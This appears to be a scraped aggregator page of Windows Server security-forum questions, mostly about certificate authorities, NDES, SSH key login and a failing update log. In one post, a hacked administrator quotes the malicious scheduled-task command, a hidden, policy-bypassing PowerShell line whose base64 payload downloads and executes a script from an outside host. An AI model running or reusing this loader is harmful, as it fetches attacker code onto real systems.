Quantcast
Channel: Security forum
Viewing all 12072 articles
Browse latest View live

Certifcate autoenrollment and auto-renewal

March 29, 2019, 5:13 pm
$
0
0

Hi there,

Some time back, we issued client authentication certificates based on a duplicated template that is being used for Cisco AnyConnect VPN client 4.4 and wireless access. The certificate is set to expire beginning mid-June this year (about 2.5 months away) with renewal period set to 6 weeks. I've encountered a couple of situations where having two certificates of the same type in the same client certificate store caused issues, though in both cases it involved all certificates in question being valid (eg. not expired, able to access CRLs, chained properly, and so on). My questions:

1. When these certificates start to auto renew (we have GPO set up for this), do I need to be concerned about the having two valid certificates of the same type present?

2. When the older of the two certificates does expire, could the VPN app or wireless get hung up on the expired certificate and not use the new one?

3. If I do need to be concerned about duplicate valid/invalid certificates, what are my options?

4. The template in question was set to publish to AD but not automatically reenroll if a duplicate cert exists in AD for the original certificate rollout. I've read for the most part that publishing certs to AD is not really recommended. Is it okay to set the renewed certificates not to publish to AD, or are their hazards in doing that due to inconsistency?

Thanks so much and my apologies for such a long post.

Chad

Search

Can I issue multiple templates or no template at all from NDES?

March 30, 2019, 9:03 pm
$
0
0

I have a Windows Server 2016 running with ADCS and NDES configured. I call the NDES endpoint by creating CSR through a script I have prepared that acts as a SCEP Client. Is there a way for NDES to just sign any CSR (through the CA of course) that comes it's way or will it only issue certs based on the template configured in the registry?

Let's say I want to issue 4 types of certificates and all of them have keyusage as signing and encryption both. Can I somehow have 1 NDES server issue these 4 types of certs (essentially meaning just sign any CSR that comes your way) or will I have to deploy multiple NDES endpoints with each issuing 1 particular type? 

Protected User Group - Event ID:100 - NTLM Authentication failed

March 17, 2019, 7:58 am
$
0
0

Got a test environment for some testing...

1 DC  Server 2016 

Few member servers 2016

When I add the user to the Protected User Security Group he cannot logon.  Thoughts?

Thank you


What does it mean by “tattooing” the Registry ?

March 21, 2019, 5:52 am
$
0
0

“ Tattooing” the registry means user can modify and view user preference that are not stored in the maintained portions of the Registry.  Even if the group policy is changed or removed, the user preference will still persist in the registry.

Windows Server 2016 Failover Cluster certificate

January 31, 2019, 3:33 am
$
0
0

Hi all,

As you might know, when creating a failover cluster, Windows Server 2016 generates a self-signed certificate and installs it to all nodes. 

Because these certificates expire in one year, we got monitoring alerts. To fix these alerts some certificates were removed from the cluster nodes. Since then, we've been unable to add new cluster nodes to the cluster due to schannel issues. I'm suspecting the removal of the cluster certificates to be the cause. 

Is there any way to renew or replace failover cluster certificates? I cannot find a thing on Google about this, only that Windows Server 2016 uses certificates for failover clustering. 

Auto enrollment for Domain controller certificate with subject alternative name

February 1, 2018, 1:01 am
$
0
0

Hi,

We need an auto enrollment template for domain controller certificates which can have SAN also. By normal method the auto enrollment for domain contoller certificate will contain only the FQDN name of the server. We need to inculde SAN also in the domain controller certificate. Is there any way we could accomplish the same.

Thanks and Regards

SSH asking for password even i have private key

March 22, 2019, 1:33 pm
$
0
0

Hi,


I am trying to establish connection to server windows machine using RSA key pairs.  I have  generated key pairs and and also copied my public key to users/myuser/.ssh/authorized_keys and also set the permissions by executing below command.

ssh --% user1@domain1@contoso.com powershell -c $ConfirmPreference = 'None'; Repair-AuthorizedKeyPermissionC:\Users\user1\.ssh\authorized_keys

When i am trying to connect to that server using ssh agent or by using putty its asking to type password and it is not doing any key based Authentication. I have tried different approaches but clue less. Can any one help me to tell what i am doing wrong here?

Thanks,

Venkata


Unable to execute windows script from SSH

April 1, 2019, 8:20 am
$
0
0

Hi,

I have batch file to run my jar file on windows virtual machine. This script is located under D:\Scripts \run_services.bat.

Below is the commands as part of batch file

@ECHO off
start java -jar D:\NSXJarfiles\BulkSolve-0.0.1-SNAPSHOT.jar 

I am trying to connect VM and try to execute the batch file run_services.bat from my laptop. using below command

ssh -v -o StrictHostKeyChecking=no -l uname  ip  "D:\Scripts\run_services.bat"  

But i did not see the script executed and started the java jar file on the machine.

When i am running the script in that machine it works fine and started the java jar file. Can any one tell what i have to do to execute this batch file in ssh mode.

Thanks,

Venkata

Search

Stop DHCP from giving out IP's to computers that do not have valid domain accounts.

February 1, 2008, 6:53 pm
$
0
0

At my company we have a DHCP server that happily gives out ip address to everyone.

"Everyone is the problem"

 

Since DHCP as far as I am aware does not have any inbuilt Auth capeabilities does anyone

have a solution where by IP addresses can be dynamically assigned based on valid user

credentials.

 

I know that MS has introduced NAP but I am trying to limit users from just jacking into the network

and getting a free IP address from the win 2008 server.

 

Could it be done with Radius ? instead.

 

Any insight or comments would be very welcome.

 

Thanks Paul.

KB4489878

March 28, 2019, 3:23 am
$
0
0

KB4489878 will not install on 2008 R2 servers in our environment.

It fails, have tried several times.

Anyone with similar problem or a solution please

Microsoft CA LDAP path

April 1, 2019, 10:21 pm
$
0
0

Hi All,

I am setting up two tier Microsoft CA, root is offline and subca is online.

I added CRL http location in the root CDP and issued certificate to the subca but not added the ldap location in the subca certificate. This is recommended without having ldap location certificate issued to the subca?

need your guidance and input on this.


Error KB4489878 200 8 R1

April 2, 2019, 3:52 am
$
0
0

When you install the update from Windows update KB4489878 fails and installs it. (Windows server 2008 R2)

The error is:

2019-04-02 10:20:05:242  860 1a10 DnldMgr Asking handler to generate non-range requests.
2019-04-02 10:20:05:242  860 1a10 Handler Generating request for CBS update 1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E in sandbox C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970_ctc
2019-04-02 10:20:05:242  860 1a10 Handler Selecting self-contained because update does not have express payload.
2019-04-02 10:20:05:242  860 1a10 Handler Selected payload type is ptSelfContained
2019-04-02 10:20:05:242  860 1a10 Handler Detected download state is dsStart
2019-04-02 10:20:05:242  860 1a10 Handler Adding Windows6.1-KB4489878-x64.cab (entire file) to request list.
2019-04-02 10:20:05:242  860 1a10 Handler Request generation for CBS update complete with hr=0x0 and pfResetSandbox=0
2019-04-02 10:20:06:272  860 1a10 Misc Validating signature for C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970_ctc\Windows6.1-KB4489878-x64.cab with dwProvFlags 0x00000080:
2019-04-02 10:20:07:723  860 1a10 Misc  Microsoft signed: Yes
2019-04-02 10:20:07:723  860 1a10 DnldMgr Asking handler to generate non-range requests.
2019-04-02 10:20:07:723  860 1a10 Handler Generating request for CBS update 1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E in sandbox C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970_ctc
2019-04-02 10:20:07:723  860 1a10 Handler Selecting self-contained because update does not have express payload.
2019-04-02 10:20:07:723  860 1a10 Handler Selected payload type is ptSelfContained
2019-04-02 10:20:07:723  860 1a10 Handler Detected download state is dsHavePackage
2019-04-02 10:20:07:723  860 1a10 Handler Request generation for CBS update complete with hr=0x0 and pfResetSandbox=0
2019-04-02 10:20:07:723  860 265c AU Launched new AU client for directive 'Download Approval', session id = 0x2
2019-04-02 10:20:07:738 5040 3014 Misc ===========  Logging initialized (build: 7.6.7601.24085, tz: +0100)  ===========
2019-04-02 10:20:07:738 5040 3014 Misc   = Process: C:\Windows\system32\wuauclt.exe
2019-04-02 10:20:07:738 5040 3014 AUClnt Launched Client UI process
2019-04-02 10:20:07:754 5040 3014 Misc ===========  Logging initialized (build: 7.6.7601.24085, tz: +0100)  ===========
2019-04-02 10:20:07:754 5040 3014 Misc   = Process: C:\Windows\system32\wuauclt.exe
2019-04-02 10:20:07:754 5040 3014 Misc   = Module: C:\Windows\system32\wucltux.dll
2019-04-02 10:20:07:754 5040 3014 CltUI AU client got new directive = 'Download Approval', serviceId = {7971F918-A847-4430-9279-4A52D1EFE18D}, return = 0
2019-04-02 10:20:07:816 11848 27a0 COMAPI -------------
2019-04-02 10:20:07:816 11848 27a0 COMAPI -- START --  COMAPI: Install [ClientId = wusa]
2019-04-02 10:20:07:816 11848 27a0 COMAPI ---------
2019-04-02 10:20:07:816 11848 27a0 COMAPI   - Allow source prompts: Yes; Forced: No; Force quiet: No
2019-04-02 10:20:07:816 11848 27a0 COMAPI   - Updates in request: 1
2019-04-02 10:20:07:816 11848 27a0 COMAPI   - ServiceID = {6A498F13-AD63-44DA-A31F-39ADA0DDC6AF} Third party service
2019-04-02 10:20:07:816  860 1da4 Agent *************
2019-04-02 10:20:07:816  860 1da4 Agent ** START **  Agent: Installing updates [CallerId = wusa]
2019-04-02 10:20:07:816  860 1da4 Agent *********
2019-04-02 10:20:07:816  860 1da4 Agent   * Updates to install = 1
2019-04-02 10:20:07:816 11848 27a0 COMAPI   - Updates to install = 1
2019-04-02 10:20:07:816 11848 27a0 COMAPI <<-- SUBMITTED -- COMAPI: Install [ClientId = wusa]
2019-04-02 10:20:07:816  860 1da4 Agent   *   Title = Security Update for Windows (KB4489878)
2019-04-02 10:20:07:816  860 1da4 Agent   *   UpdateId = {00B91A79-94CE-4E82-BA5F-5E8CE88C0F64}.501
2019-04-02 10:20:07:816  860 1da4 Agent   *     Bundles 1 updates:
2019-04-02 10:20:07:816  860 1da4 Agent   *       {1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E}.501
2019-04-02 10:20:08:362  860 1da4 Agent WARNING: failed to calculate prior restore point time with error 0x80070002; setting restore point
2019-04-02 10:20:08:362  860 1da4 Agent WARNING: LoadLibrary failed for srclient.dll with hr:8007007e
2019-04-02 10:20:08:362  860 1da4 Handler Attempting to create remote handler process as MADAP8017\Administrator in session 3
2019-04-02 10:20:08:378  860 1da4 DnldMgr Preparing update for install, updateId = {1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E}.501.
2019-04-02 10:20:08:393 10192 2618 Misc ===========  Logging initialized (build: 7.6.7601.24085, tz: +0100)  ===========
2019-04-02 10:20:08:393 10192 2618 Misc   = Process: C:\Windows\system32\wuauclt.exe
2019-04-02 10:20:08:393 10192 2618 Misc   = Module: C:\Windows\system32\wuaueng.dll
2019-04-02 10:20:08:393 10192 2618 Handler :::::::::::::
2019-04-02 10:20:08:393 10192 2618 Handler :: START ::  Handler: CBS Install
2019-04-02 10:20:08:393 10192 2618 Handler :::::::::
2019-04-02 10:20:08:409 10192 2618 Handler Starting install of CBS update 1F0F864B-6410-41CB-BC6D-A06BEF6AFE7E
2019-04-02 10:20:08:799 10192 2618 Handler CBS package identity: Package_for_RollupFix~31bf3856ad364e35~amd64~~7601.24385.1.9
2019-04-02 10:20:08:815 10192 2618 Handler Installing self-contained with source=C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970\Windows6.1-KB4489878-x64.cab, workingdir=C:\Windows\SoftwareDistribution\Download\98fb16fa475dbcd684e862b511a27970\inst
2019-04-02 10:20:13:370  860 195c Report REPORT EVENT: {66649B29-CBDF-4DAA-B3EE-6F969812A173} 2019-04-02 10:20:08:362+0100 1 181 101 {00B91A79-94CE-4E82-BA5F-5E8CE88C0F64} 501 0 wusa Success Content Install Installation Started: Windows successfully started the following update: Security Update for Windows (KB4489878)
2019-04-02 10:20:33:619  860 2bbc AU Getting featured update notifications.  fIncludeDismissed = true
2019-04-02 10:20:33:619  860 2bbc AU No featured updates available.
2019-04-02 10:23:17:309 10192 2790 Handler FATAL: CBS called Error with 0x80070002,
2019-04-02 10:23:21:365 10192 2618 Handler FATAL: Completed install of CBS update with type=0, requiresReboot=0, installerError=1, hr=0x80070002

New Server 2016 CA - Certificate Template Questions

April 2, 2019, 5:22 am
$
0
0

Hi All,

I am in the process of  building 2016 certificate servers to replace existing 2008 servers. There are already a number of certificate templates published in the 2008 server. I want to do a cleanup and keep the bare minimum. These are the currently published templates.


I just want to confirm couple of things.

1. Do I need the Basic EFS template when I have the "encrypting file system" added to the user template?

2. If I publish Kerberos authentication can I get rid of the Domain Controllers and Domain Controller Authentication templates? What would be the security settings on the kerberos template? Would it be permissions just for domain controllers only?

3. I have already setup a kra service account and enabled it for key recovery agent.

    a) Do I need to setup Bitlocker and EFS recovery agents also to decrypt files if a user leaves etc?

    b) Can I just add bitlocker drive encryption, Bitlocker Data Recovery Agent and File recovery application policies to the      kra template and use the same certificated published via group policy to perform these tasks?

Any help is highly appreciated.


Build an Enterprise CA in a domain which has a domain joined Standalone CA

April 2, 2019, 8:35 am
$
0
0
I have a standalone CA in my environment which is domain joined for some reason which I am not aware of nor have any documentation suggesting the reason. This is currently used for multiple Applicaton related (non domain and domain related) certificate signing activities (I am aware of the fact that this is not a recommended procedure). I would like to now build a new Enterprise CA, while using this Standalone CA as well in the environment (will consider moving this to a workgroup). Please suggest how can I achieve this without any conflicts. In all desktops and laptops, I see the certificate for the Standalone CA added in the 'Trusted Root Certification Authorities" [MMC --> Certificates (Local Computer) --> Trusted Root Certification Authorities --> Certificates]. This CA is not part of the "Cert Publishers" group in AD.

-- JPM

Folder Secuity

April 2, 2019, 11:20 am
$
0
0

Hi All,

I have an issue with folder security. I create a folder and in security, Administrators group is added. While in the AD user, I added the user to the Administrators group. This should allow the user to access the folder , but when I click the folder it says that no permission to access

Setup:

1. Folder Setup



2. Account 

3. Output

Search

Migrate CRL (HTTP) and OCSP to new CA server

April 2, 2019, 12:39 pm
$
0
0

Hi There,

We have to migrate certificate authority servers currently running on Windows 2008R2 to new Windows 2016 servers.

We have 1 Offline root ca and 2 Enterprise CA servers. One of the enterprise CA server is also configured to host  CDP (http://crl.contoso.com) and OCSP. 

I wonder IIS configuration related to CDP and OSCP are backedup when backup CA server configuration? Can you please throw some light on how to migrate these services to new server properly and rollback approach?

Thanks in advance!

Mahi

Deleted schedule tasks are still being performed

April 2, 2019, 10:04 pm
$
0
0

My Server hacked by others. 

there are some schedule taks run powershell command . I delete all of them. But those task still running. what should i do?

here is the power shell command

HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -nop -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAHkANgBoAC4AbgBlAHQALwBnAD8AaAAxADkAMAAzADIAMQAnACkA

CertUtil: The RPC server is unavailable

March 27, 2019, 3:46 am
$
0
0

Hi,

If i run command as administrator from client computer : certutil -ping -config ****
I get response.
If i run same command as standard user, i receave 
Server could not be reached: The RPC server is unavailable. 0x800706ba (WIN32: 1722 RPC_S_SERVER_UNAVAILABLE) -- (31ms)

CertUtil: -ping command FAILED: 0x800706ba (WIN32: 1722 RPC_S_SERVER_UNAVAILABLE)
CertUtil: The RPC server is unavailable.

Thx,

borut

BlatniS

Kerberos version in windows server 2016

March 27, 2019, 9:35 pm
$
0
0

Hi,

how to find kerberos version of windows server 2016. Can someone share the path or command to find the same.

How to generate internal CA certificate on Windows domain

March 28, 2019, 7:00 am
$
0
0

Hi all,

I am a cert newbie but have been given the task of providing some internal certificates for some new servers in our Windows domain. The web development team have sent me some .req files. We have two internal CA servers, one for root and one for intermediate but I'm not sure exactly how to forfill the requests. I tried "submit new request" and then pointing to the .req file but I got the error below.

"The request contains no certificate template information 0x80094801 CERTSRV_E_NO_CERT_TYPE

Denied by Policy Module 0x80094801. The request does not contain a certificate template extension or the CertificateTemplate request attribute."

Any advice appreciated - thanks!

Viewing all 12072 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>